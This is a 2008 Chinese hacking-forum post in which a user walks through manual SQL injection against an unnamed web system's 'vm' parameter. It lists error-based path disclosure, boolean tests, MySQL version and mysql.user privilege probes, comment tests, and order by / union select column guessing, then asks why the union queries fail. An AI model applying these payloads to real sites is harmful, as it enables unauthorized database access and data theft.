|
 
- 帖子
- 255
- 积分
- 678
- 威望
- 1093
- 金钱
- 877
- 在线时间
- 2 小时
|
[讨论]奇怪的php注射点
议题作者:唐不狐
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
在某web系统后台检测的时候获得一个注射点,情况如下:
.php?vm=30'
报错,得到web路径 /*(窃喜ing)
.php?vm=30 and 1=1
返回正常
.php?vm=30 and 1=2
页面异常
----------------到此判断可注射----------------------------------
接下来
.php?vm=30 and ord(mid(version(),1,1))>51
返回正常,说明数据库版本大于4.0,支持union查询
.php?vm=30 and (select count(*) from mysql.user)>0
正常,嘿嘿,有权限喔.
接着用C4经典注射证实如下:mysql版本4.1.2,连接用户是root,库名也出来了
--------------------------接下来就郁闷了------------------------------------------
.php?vm=30/*buhu
返回错误,晕猪,难道不能用/*注释?
.php?vm=30#buhu
返回正常,可以用#注释
接下来常规手法猜字段长度
.php?vm=30 order by 10
报错,日,字段小于10?其实我估算了下,字段绝对在10以上的.暂且信它,继续...
.php?vm=30 order by 5 返回错误
.php?vm=30 order by 1 返回错误
.php?vm=30 order by 0 返回错误,彻底无语 (加#注释一样)
.php?vm=30 and 1=2 union select 1,2,3...... 咱就干到110,还是报错.不可能哇
换个方式
.php?vm=30 and 1=2 union select char(97),char(97),char(97)....
依然报错
---------------------------虾米意思?--------------------------------------------------
请大大们指教! thx!
1 什么原因?
2 如何继续?
帖子145 精华2 积分574 阅读权限50 性别男 来自china 在线时间107 小时 注册时间2005-9-27 最后登录2008-7-21 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味
wyzhack 
晶莹剔透§烈日灼然 |
|
发表于 2008-7-22 15:22
| 